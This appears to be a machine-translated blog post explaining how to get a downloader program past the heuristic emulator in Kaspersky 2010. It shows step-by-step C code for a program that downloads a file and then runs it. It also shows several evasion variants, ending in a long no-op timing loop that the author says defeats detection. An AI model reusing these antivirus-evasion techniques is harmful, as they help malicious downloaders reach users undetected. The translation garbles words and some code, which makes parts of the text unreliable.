How to bypass heuristic Virus Detection on Kabbah Virtual Machine

How to bypass heuristic Virus Detection on Kabbah Virtual Machine

I understand that there is a virtual heuristic Virus Detection Function in Kabbah 7. Someone posted an article on the blog about how to break through Kabbah 7's heuristic Virus Detection [1]. Kabbah 8 and the latest Kabbah 2010 still have this feature. Kaspersky does not need to be mentioned. Everyone knows.
I recently found on the internet that Kaspersky was developed in cooperation with the Russian National Emy of sciences and exclusively used by the military and the Kremlin. I am not clear about this yet. Please forgive me for my ignorance. Let me first talk about the virtual machine heuristic anti-virus.

I think the heuristic anti-virus of virtual machines here can be understood as executing and heuristic anti-virus in virtual machines. A Virtual Machine constructs a virtual execution environment or a simulation environment, and runs virus and other malicious code in the simulation environment to implement self-shelling. The simulation environment is isolated from the real environment of your computer.

For example, today's malicious code uses shelling to protect itself, especially some known virus variants. When malicious code using virtual machine execution technology and shell protection can still be detected by anti-virus software, competent readers can experiment on their own.

Heuristic means self-discovery and inference or determination of things. Heuristic Antivirus is determined by analyzing the sequence of program commands or the call sequence of API functions, and the combination of experience and knowledge of other malicious code and normal programs. Such heuristic anti-virus has the characteristics of artificial intelligence. I don't need to talk about its advantages. For example, Downloader believes that everyone knows that the two most important APIs are urldownloadtofile and ShellExecute (or other APIs that execute a program ). For example, when using virtual machine heuristic anti-virus, urldownloadtofile or ShellExecute appears in the API call sequence of the virus detection program, or, if you do not follow the call sequence of urldownloadtofile and then ShellExecute, Downloader will not be reported.

It can be said that due to the shortcomings of the Active Defense Technology, various antivirus software vendors have taken Virtual Machine antivirus and heuristic antivirus as the targets of the anti-virus industry. It is foreseeable that the anti-virus software will not frequently pop up active defense windows when the system and software are used normally in the next few years.

Next, we will use the downloader example mentioned above to analyze the characteristics of the qaba Virtual Machine heuristic virus detection, and finally provide a possible Bypass Method and Demo code for you to enjoy.

I suppose you already know what downloader is, and the simplest downloader is:

#include "stdafx.h"#include <urlmon.h>#include <Shellapi.h>#pragma comment (lib,"Urlmon.lib")int APIENTRY _tWinMain(HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPTSTR    lpCmdLine,                     int       nCmdShow){TCHAR szFileName[MAX_PATH] = {0};URLDownloadToCacheFile(NULL,L"file://c:\\windows\\notepad.exe",szFileName,MAX_PATH,0,NULL);ShellExecute(0,L"open",szFileName,NULL,NULL,SW_SHOW);return 0;}

This program is a Win32 Window project created using Visual Studio 2008. After compilation, Kabbah 2010 directly reports Downloader. . In this case, check that the parent path is the parent path of assumer.exe, but if the parent path is cmd.exe. Of course, the downloadervice is not strong, because downloadervice is started by cmd.exe.

I think there should be other methods to escape the virtual virus detection, but here we only start with the virtual virus detection. First, is there a difference between this virtual machine and the real environment? Of course, this answer is positive. But where are these differences? Will these differences affect. Is there a situation where the virtual machine cannot be virtualized and the urldownloadtocachefile and ShellExecute cannot be executed in the virtual environment, so downloader is not checked. This idea is simple. How can we achieve it.

First, consider whether the virtual machine has virtualized Exception Handling. If there is no virtual Exception Processing, we think that creating an exception, do I have to place the downloader API calling in the exception handling program without bypassing it. So with the following code

BOOL SafeDiv(INT32 dividend, INT32 divisor, INT32 *pResult){    __try    {*pResult = dividend / divisor;    }    __except(GetExceptionCode() == EXCEPTION_INT_DIVIDE_BY_ZERO ?             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)    {TCHAR szFileName[MAX_PATH] = {0};URLDownloadToCacheFile(NULL,L"file://c:\\windows\\notepad.exe",szFileName,MAX_PATH,0,NULL);ShellExecute(0,L"open",szFileName,NULL,NULL,SW_SHOW);return TRUE;    }    return TRUE;}

At the program entry of downloader, call the safediv function with the divisor parameter 0 ,. In this way, an error with the division of 0 will be generated. The result is Downloader! It seems that Kabbah is capable of virtualizing exception handling.

Well... What happens if I add INT 3 to the Code for interruption? It should also be virtual. Now let's try it. After INT 3 is added to the downloader entry, it cannot be found. Oh, the program cannot run. Next, let's see if we can find a way to make the program run in real conditions, and stop it under the virtual machine. It was not long before I thought of an alternative method to determine the input parameters of the program. Check the input parameters of the program to control the execution process of the program. Simply add the code to judge program parameters at the downloader entry:

if(strcmp(argv[1],"1")!== 0)return;

When the program is running, enter the parameter "1" to execute the downloader function. If no parameter is input in the VM, the program returns and the malicious function call sequence cannot be detected. Of course, such malicious code is ugly, so I want to use CreateProcess to start another downloader instance. The Code is as follows:

Some variable declarations and initialization code are omitted...

INT32 divisor = 1;if(argc == 1){TCHAR szPath[MAX_PATH];GetModuleFileName(NULL,szPath,MAX_PATH);CreateProcess(szPath,L"1 2",NULL,NULL,FALSE,0,NULL,NULL,&si,π);ExitProcess(0);return;}if(strcmp(argv[1],"2") == 0)divisor = 0;SafeDiv(10,divisor,&Result);ExitProcess(0);return;}

After compilation is successful, Kaba 2010 is used for virus detection. Downloader! Disappointed!

Replace the function parameter check method with the "named object" method:

// Define a "named object" tchar szmutex [] = l "11111"; handle hevent = createevent (null, szmutex); int TMP = getlasterror (); if (TMP = 0) {startupinfo Si; process_information PI; zeromemory (& Si, sizeof (SI); SI. CB = sizeof (SI); zeromemory (π, sizeof (PI); tchar szpath [max_path]; getmodulefilename (null, szpath, max_path); CreateProcess (szpath, null, null, null, false, 0, null, null, & Si, π); Return 0;} tchar szfilename [max_path] = {0}; urldownloadtocachefile (null, l "file: // C: \ Windows \ notepad.exe ", szfilename, max_path, 0, null); ShellExecute (0, l" open ", szfilename, null, null, sw_show ); return 0;

Downloader! Disappointed!

It seems that Kabbah's virtual machine is in place to simulate the API and execute the program! I don't know how to virtualize the time? Will statements containing sleep (10000000) in the code affect the time of virtual virus detection? According to my experiment, adding the sleep function to sleep for a long period of time does not affect the virtual anti-virus detection downloader time, so it is estimated that the virtual time may not be good. Call sleep after calling CreateProcess in the above Code for a long time, for example, 5 seconds, and then call closehandle to close the "Naming event ".
If Kabbah encounters a simple skip of the sleep function, the sequence of execution in the virtual machine will be the closehandle closing event after the sleep is executed first, and then the "name event" is created in the new instance ", in this case, the program can be created successfully, so the execution process of the program will not enter the urldownloadtocachefile to bypass the detection. However, downloader is still reported in actual situations, indicating that Kabbah 2010 is also good for time-related functions such as sleep.

Now let's stop and think about it. We have mastered many of the features of the Kabbah virtual machine. The best solution is to improve the above methods, it can achieve attacks on the time when the Kabbah virtual machine is executed. So I thought of using a large number of meaningless code blocks to simulate the sleep function. The reason is whether Kabbah, a meaningless operation with a large number of loops, is completely virtualized for execution. I think it should be none. The Code becomes:

#include "stdafx.h"#include <urlmon.h>#include <Shellapi.h>#include <intrin.h>#pragma comment (lib,"Urlmon.lib")// Global Variables:HINSTANCE hInst;    // current instance// Forward declarations of functions included in this code module:int APIENTRY _tWinMain(HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPTSTR    lpCmdLine,                     int       nCmdShow){TCHAR szMutex[] = L"1111";HANDLE hEvnet = CreateEvent(NULL,NULL,NULL,szMutex);int tmp = GetLastError();if(tmp == 0){STARTUPINFO si;PROCESS_INFORMATION pi;ZeroMemory( &si, sizeof(si) );si.cb = sizeof(si);ZeroMemory( π, sizeof(pi) );TCHAR szPath[MAX_PATH];GetModuleFileName(NULL,szPath,MAX_PATH);CreateProcess(szPath,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,π);for(int i = 0;i < 1000000000; i++)__nop();CloseHandle(hEvnet);return 0;}TCHAR szFileName[MAX_PATH] = {0};URLDownloadToCacheFile(NULL,L"file://c:\\windows\\notepad.exe",szFileName,MAX_PATH,0,NULL);ShellExecute(0,L"open",szFileName,NULL,NULL,SW_SHOW);return 0;}

Compile. Check the file for viruses and no threats are detected. Succeeded.

In general, Kabbah's virtual machine does not really look like a real environment

for(int i = 0;i < 1000000000; i++)__nop();

Such statement blocks perform real execution, resulting in inconsistent time between the virtual machine and the real environment, resulting in different execution flows between the virtual machine and the real environment. This allows you to bypass the Kabbah virtual virus detection.

In general, Kaspersky is a powerful anti-virus software, and its anti-virus capabilities are indeed strong, but it should not trust Kabbah too much. Some people say that they should make people correctly understand Kaspersky, an excellent anti-virus software.

In addition, the timeout-based attack ideas in this article are quite similar to those in the article [2] two years ago, "Timing Attack" has 1,110,000 [3] search results on google scholar! I hope that through this article, you will be able to understand the wonders of timing attack again.

Finally, I would like to thank c4pr1c3 for its help and care.

Related Literature:
[1] http://www.xyzreg.net/blog/read.php? 39 & page = 5
[2] http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf
[3] http://scholar.google.com/scholar? Q = timing + attack & HL = en & btng = search

Reference: http://huaidan.org/archives/3440.html